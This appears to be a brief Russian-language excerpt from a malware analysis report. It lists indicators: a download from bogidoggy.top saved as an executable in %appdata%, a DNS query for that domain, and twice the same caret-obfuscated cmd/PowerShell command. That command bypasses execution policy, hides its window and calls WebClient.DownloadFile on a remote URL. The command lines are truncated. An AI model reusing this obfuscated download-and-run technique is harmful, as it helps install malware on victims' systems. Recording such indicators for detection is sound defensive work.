Техническая информация
- http://bogidoggy.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^W^E^rSh^eLL.^ExE^ -EX^E^Cu^TI^onpOl^IC^Y^ B^yP^aSs^ ^-NOpRoF^i^le^ ^-^W^i^n^Do^WS^T^yLE HiDDEN (^ne^W-^OBj^e^CT ^SYStEM^.neT.^w^eBclIen^T).D^OW^NL^o^aDfil^e('http://b...
- DNS ASK bo###oggy.top
- '<SYSTEM32>\cmd.exe' /C "p^o^W^E^rSh^eLL.^ExE^ -EX^E^Cu^TI^onpOl^IC^Y^ B^yP^aSs^ ^-NOpRoF^i^le^ ^-^W^i^n^Do^WS^T^yLE HiDDEN (^ne^W-^OBj^e^CT ^SYStEM^.neT.^w^eBclIen^T).D^OW^NL^o^aDfil^e('http://b...' (со скрытым окном)